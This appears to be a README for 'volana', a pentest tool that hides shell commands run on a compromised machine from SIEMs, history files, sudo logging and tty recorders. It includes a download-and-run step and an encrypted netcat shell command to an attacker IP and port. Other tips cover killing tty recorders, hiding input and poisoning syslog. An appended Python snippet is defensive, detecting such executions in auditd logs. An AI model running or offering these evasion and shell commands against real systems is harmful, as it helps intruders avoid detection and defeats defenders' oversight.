Volana - Shell command obfuscation to avoid detection systems

Overview

volana (moon in Malagasy)

{ Use it ; 🌚 (hide from); 🌞 (detected by) }

Shell command obfuscation to avoid SIEM/detection systems

During a pentest, an important aspect is to be stealthy. For this reason you should clear your tracks after your passage. Nevertheless, many infrastructures log commands and send them to a SIEM in real time, making the afterwards cleaning part alone useless.

volana provides a simple way to hide commands executed on a compromised machine by providing its own shell runtime (enter your command, volana executes it for you). This way you clear your tracks DURING your passage.

Usage

You need to get an interactive shell. (Find a way to spawn it, you are a hacker, it's your job! Otherwise, see the non-interactive shell section below.) Then download it on the target machine and launch it. That's it, now you can type the commands you want to be stealthily executed.

## Download it from the GitHub release
## If you do not have internet access from the compromised machine, find another way
curl -lO -L https://github.com/ariary/volana/releases/latest/download/volana

## Execute it
./volana

## You are now under the radar
volana » echo "Hi SIEM team! Do you find me?" > /dev/null 2>&1  # you are allowed to be a bit cocky
volana » [command]

Keywords for the volana console:

  • ring: enable ring mode, i.e. each command is launched along with plenty of others to cover tracks (from solutions that monitor system calls)
  • exit: exit the volana console

From a non-interactive shell

Imagine you have a non-interactive shell (webshell or blind RCE); you can use the encrypt and decrypt subcommands. First, you need to build volana with an embedded encryption key.

On the attacker machine

## Build volana with an encryption key
make build.volana-with-encryption

## Transfer it to TARGET (the only detectable command)
## [...]

## Encrypt the command you want to stealthily execute
## (Here a nc bindshell to obtain an interactive shell)
volana encr "nc [attacker_ip] [attacker_port] -e /bin/bash"
>>> ENCRYPTED COMMAND

Copy the encrypted command and execute it with your RCE on the target machine

./volana decr [encrypted_command]
## Now you have a bindshell; spawn it to make it interactive and use volana as usual to be stealthy (./volana). Don't forget to remove the volana binary before leaving (because the decryption key can easily be retrieved from it)

Why not just hide the command with echo [command] | base64? And decode it on the target with echo [encoded_command] | base64 -d | bash

Because we want to be protected against systems that trigger an alert on base64 use or that look for base64 text in commands. Also, we want to make investigation difficult, and base64 isn't a real obstacle.

Detection

Keep in mind that volana is not a miracle that will make you totally invisible. Its aim is to make intrusion detection and investigation harder.

By detected we mean being able to trigger an alert if a certain command has been executed.

Hide from

Only the volana launching command line will be caught

  • Detection systems that are based on the history command output
  • Detection systems that are based on history files
    • .bash_history, .zsh_history, etc.
  • Detection systems that are based on bash debug traps
  • Detection systems that are based on the sudo built-in logging system
  • Detection systems tracing all process syscalls system-wide (e.g. opensnoop)
  • Terminal (tty) recorders (script, screen -L, sexonthebash, ovh-ttyrec, etc.)
    • Easy to detect & avoid: pkill -9 script
    • Not a common case
    • screen is a bit more difficult to avoid; however it does not record input (secret input: stty -echo => avoided)
    • Command detection could be avoided with volana with encryption

Visible for

  • Detection systems that alert on unknown commands (the volana one)
  • Detection systems that are based on a keylogger
    • Easy to avoid: copy/paste commands
    • Not a common case
  • Detection systems that are based on syslog files (e.g. /var/log/auth.log)
    • Only for sudo or su commands
    • syslog files could be modified and thus poisoned as you wish (e.g. for /var/log/auth.log: `logger -p auth.info "No hacker is poisoning your syslog solution, don't worry"`)
  • Detection systems that are based on syscalls (e.g. auditd, LKM/eBPF)
    • Difficult to analyze; could be made unreadable by generating many diversion syscalls
  • Custom LD_PRELOAD injection to log commands
    • Not a common case at all
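The list above says execve-level auditing still sees every child command even when shell history only records the ./volana launch. As an added illustration of that point (not code from the volana project), the script below correlates constructed, simplified auditd-style SYSCALL/EXECVE records by audit serial and flags executables launched from outside package-managed directories together with the commands such a parent spawns. It assumes an execve audit rule such as `-a always,exit -F arch=b64 -S execve -k exec` is loaded on the host; the records are constructed sample data (real auditd hex-encodes arguments that contain spaces).

```python
import re

# Constructed, simplified auditd-style records (sample data, not real logs). Real auditd
# hex-encodes arguments with spaces; here they are quoted for readability. Shape modelled:
# a user runs a binary from /tmp which then spawns commands on the user's behalf.
SAMPLE_AUDIT_LOG = """\
type=SYSCALL msg=audit(1655900000.100:101): syscall=59 success=yes ppid=1200 pid=1300 auid=1000 comm="bash" exe="/usr/bin/bash" key="exec"
type=EXECVE msg=audit(1655900000.100:101): argc=1 a0="bash"
type=SYSCALL msg=audit(1655900001.200:102): syscall=59 success=yes ppid=1300 pid=1310 auid=1000 comm="volana" exe="/tmp/volana" key="exec"
type=EXECVE msg=audit(1655900001.200:102): argc=1 a0="./volana"
type=SYSCALL msg=audit(1655900005.300:103): syscall=59 success=yes ppid=1310 pid=1320 auid=1000 comm="sh" exe="/usr/bin/dash" key="exec"
type=EXECVE msg=audit(1655900005.300:103): argc=3 a0="sh" a1="-c" a2="uname -a"
type=SYSCALL msg=audit(1655900009.400:104): syscall=59 success=yes ppid=1300 pid=1330 auid=1000 comm="ls" exe="/usr/bin/ls" key="exec"
type=EXECVE msg=audit(1655900009.400:104): argc=2 a0="ls" a1="-la"
"""

# Where package-managed binaries live; anything else (/tmp, $HOME, /dev/shm) is user-writable.
TRUSTED_DIRS = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/", "/usr/local/bin/")

RECORD = re.compile(r'type=(\w+) msg=audit\([\d.]+:(\d+)\): (.*)')
FIELD = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')

def parse_events(log):
    """Merge the SYSCALL and EXECVE records sharing an audit serial into one event."""
    events = {}
    for line in log.splitlines():
        m = RECORD.match(line)
        if not m:
            continue
        rtype, serial, body = m.groups()
        ev = events.setdefault(serial, {"serial": serial})
        fields = {k: quoted or bare for k, quoted, bare in FIELD.findall(body)}
        if rtype == "SYSCALL":
            ev.update(pid=fields["pid"], ppid=fields["ppid"], exe=fields["exe"])
        elif rtype == "EXECVE":
            ev["argv"] = [fields[f"a{i}"] for i in range(int(fields["argc"]))]
    return [events[s] for s in sorted(events, key=int)]

def detect(log):
    """Return (serial, reason, argv) for execs that shell-history logging would miss."""
    events = parse_events(log)
    exe_by_pid = {ev["pid"]: ev["exe"] for ev in events}
    findings = []
    for ev in events:
        parent = exe_by_pid.get(ev["ppid"])  # None if the parent's exec predates the log
        if not ev["exe"].startswith(TRUSTED_DIRS):
            findings.append((ev["serial"], "exec from untrusted path", ev["argv"]))
        elif parent is not None and not parent.startswith(TRUSTED_DIRS):
            findings.append((ev["serial"], f"spawned by untrusted parent {parent}", ev["argv"]))
    return findings
```

On the sample, serial 101 (the user's own bash) and 104 (ls run from bash) are silent, while 102 (the /tmp binary) and 103 (the command it spawned) are reported with their full argv.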

Bug bounty

Sorry for the clickbait title, but no money will be provided to contributors. 🐛

Let me know if you have found:

  • a way to detect volana
  • a way to spy on the console that doesn't detect volana commands
  • a way to avoid a detection system

Report here

Credit

Releases: v1.0.0
Owner: Ariary, Security Engineer naively hoping that his technical background will one day be more effective than social engineering